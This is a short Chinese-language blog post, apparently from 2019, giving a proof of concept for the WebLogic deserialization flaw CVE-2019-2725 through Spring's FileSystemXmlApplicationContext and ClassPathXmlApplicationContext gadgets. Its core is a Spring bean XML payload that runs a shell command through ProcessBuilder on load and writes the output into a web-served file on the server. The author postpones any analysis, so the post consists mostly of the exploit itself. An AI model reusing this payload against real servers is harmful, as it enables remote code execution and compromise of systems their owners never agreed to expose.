Fork me on GitHub

CVE-2019-2725 二次反序列化FileSystemXmlApplicationContext Gadget POC

POC如下:

除了FileSystemXmlApplicationContext这个类,还有com.bea.core.repackaged.springframework.context.support.ClassPathXmlApplicationContext这个类跟他作用一样。
都是AbstractXmlApplicationContext类的子类,其中的FileSystemXmlApplicationContext和ClassPathXmlApplicationContext类可以用于加载spring的配置文件,利用spring的依赖注入同样可以完成RCE的利用。

写入恶意远程地址


写入shell的xml这样写:

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     [url]http://www.springframework.org/schema/beans[/url] [url]http://www.springframework.org/schema/beans/spring-beans.xsd[/url]">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>sh</value>
                <value>-c</value>
                <value><![CDATA[whoami > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/favicon.ico]]></value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

漏洞分析先留个坑,有空在写出来

GitHub:https://github.com/Afant1
不忘初心、方得始终
Copyright@2021 Afant1
[转载文章务必保留出处和署名,谢谢!]
posted @ 2019-05-05 19:32  Afant1  阅读(696)  评论(0编辑  收藏  举报